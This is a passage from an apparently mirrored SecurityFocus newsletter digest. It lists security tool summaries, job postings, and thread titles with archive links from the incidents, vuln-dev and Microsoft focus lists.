Platforms: Os Independent
Summary:

labrea is a program that creates a "sticky honeypot" by taking over unused IP addresses on a network and creating virtual machines that answer to connection attempts. labrea answers those connection attempts in a way that causes the machine at the other end to get "stuck", sometimes for a very long time.

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

6. Looper Event / Alert System v0.20
by Mohit Muthanna bugs@muthanna.com
Relevant URL:
http://looper.sourceforge.net/
Platforms: AIX, FreeBSD, HP-UX, Linux, OpenBSD, Solaris, SunOS Summary:

Looper is a highly modularized application designed to simplify the event / alert model. Primarily used for Network Management, this application can be used to accomplish a variety of tasks related to logging and alerting such as listening for SNMP traps and logging to a file or sending notification to Netcool (a la "trapd probe"), reading a log file for alerts and sending notification via e-mail, parsing syslogs and sending notifications to Netcool (a la "syslog probe"), etc. Looper can also be used as an ad-hoc Netcool probe or Gateway.

V. SECURITY JOBS SUMMARY

1. Technical security reconciliation (Thread) Relevant URL:

http://online.securityfocus.com/archive/77/312642

2. Internship in São Paulo / Brazil (Thread) Relevant URL:

http://online.securityfocus.com/archive/77/312601

3. Forensic and Information Security Analyst Looking for a home in NYC (Thread) Relevant URL:

http://online.securityfocus.com/archive/77/312574

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

4. Systems Engineer - Application Level Security (Thread) Relevant URL:

http://online.securityfocus.com/archive/77/312573

5. Security Sales Professionals Needed (Thread) Relevant URL:

http://online.securityfocus.com/archive/77/312478

6. Looking for Job in Italy (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/312475

7. Network Security Engineer - NJ (Thread) Relevant URL:

http://online.securityfocus.com/archive/77/312418

Can't find what you're looking for?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

8. Needed Penetration Testers (Thread)
Relevant URL:

http://online.securityfocus.com/archive/77/312384

9. Senior Security Consultant needed in Washington DC (Thread) Relevant URL:

http://online.securityfocus.com/archive/77/312375

1. looking for Security Professionals in India (Thread) Relevant URL:

http://online.securityfocus.com/archive/77/312374

1. Infrastructure Security Manager- Rhode Island (Thread) Relevant URL:

http://online.securityfocus.com/archive/77/312373

1. Sunny Florida - Application Security Engineer (Thread) Relevant URL:

http://online.securityfocus.com/archive/77/311925

VI. INCIDENTS LIST SUMMARY

1. Scans on TCP port 135 (Thread) Relevant URL:

Don't know where to look next?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

http://online.securityfocus.com/archive/75/312587

2. Weird Profile in Documents and Settings (Thread) Relevant URL:

http://online.securityfocus.com/archive/75/312586

3. Distributed spam-based DoS in progress (Thread) Relevant URL:

http://online.securityfocus.com/archive/75/312469

4. Dead thread -- Distributed spam-based DoS in progress (Thread) Relevant URL:

http://online.securityfocus.com/archive/75/312422

5. port 17300 probe fingerprint analysis (Thread) Relevant URL:

Confused? Frustrated?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

http://online.securityfocus.com/archive/75/312366

6. Kuang2 strikes again, is it just me? (Thread) Relevant URL:

http://online.securityfocus.com/archive/75/312277

7. www.nopop.net (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312115

8. Web Defacement (Thread)
Relevant URL:

http://online.securityfocus.com/archive/75/312088

9. mIRC Trojan Variant - port 445 worm/Trojan (Thread) Relevant URL:

Call Pantek today for Open Source Technical Support at 1-877-546-8934 - 24/7/365

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

http://online.securityfocus.com/archive/75/312086

1. ano@ano.com ftpd dip.t-dialin.net (Thread) Relevant URL:

http://online.securityfocus.com/archive/75/312000

1. Incidents list administrivia and introductions... (Thread) Relevant URL:

http://online.securityfocus.com/archive/75/311980

1. Spies on Your PC HDrv (Thread) Relevant URL:

http://online.securityfocus.com/archive/75/312181

1. ICMP Destination Unreachable, Administratively Prohibited (Thread) Relevant URL:

http://online.securityfocus.com/archive/75/311955

1. S4T4N1C Web Defacement (Thread) Relevant URL:

http://online.securityfocus.com/archive/75/311952

VII. VULN-DEV RESEARCH LIST SUMMARY

1. Call For Papers Announcement: Black Hat Briefings Amsterdam (Thread) Relevant URL:

http://online.securityfocus.com/archive/82/312492

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

2. VisualBasic auditing2 (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/312496

3. VisualBasic auditing (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/312507

4. Is this an off-by-one overflow? (Thread) Relevant URL:

http://online.securityfocus.com/archive/82/312501

5. [argv] BitchX-353 Vulnerability (Thread) Relevant URL:

http://online.securityfocus.com/archive/82/312223

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

6. A different bash blues (Thread)
Relevant URL:

http://online.securityfocus.com/archive/82/311992

7. glibc glob_filename() recurse call stack overflow (Re[2]: Bash Blues) (Thread) Relevant URL:

http://online.securityfocus.com/archive/82/311991

8. glibc glob_filename() recurse call stack overflow (Re[2]: Bash Blues ) (Thread) Relevant URL:

http://online.securityfocus.com/archive/82/311990

9. Windows 2000 Static arp not static (Thread) Relevant URL:

http://online.securityfocus.com/archive/82/311931

1. Administrivia: Bash Blues (Thread) Relevant URL:

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

http://online.securityfocus.com/archive/82/311892

1. Bash Blues. (Thread) Relevant URL:

http://online.securityfocus.com/archive/82/311863

VIII. MICROSOFT FOCUS LIST SUMMARY

1. Windows2000 QuickLaunch (Thread) Relevant URL:

http://online.securityfocus.com/archive/88/312594

2. MS Software Update Service (Thread)
Relevant URL:

http://online.securityfocus.com/archive/88/312595

3. AW: MS Software Update Service (Thread) Relevant URL:

http://online.securityfocus.com/archive/88/312591

Can't find what you're looking for?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

4. Restricting CmdExec Rights to Sysadmin (Thread) Relevant URL:

http://online.securityfocus.com/archive/88/312598

5. Windows station permissions, remote control programs,lower priviledge accounts (Thread) Relevant URL:

http://online.securityfocus.com/archive/88/312551

6. AW: Restricting CmdExec Rights to Sysadmin (Thread) Relevant URL:

http://online.securityfocus.com/archive/88/312547

7. [despammed] Defeating password cracking (Thread) Relevant URL:

http://online.securityfocus.com/archive/88/312549